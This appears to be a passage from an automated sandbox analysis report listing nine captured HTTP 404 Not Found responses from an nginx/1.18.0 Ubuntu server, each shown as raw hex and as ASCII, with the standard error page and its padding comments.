    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:54:52 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:18 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:24 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:53 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:59 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
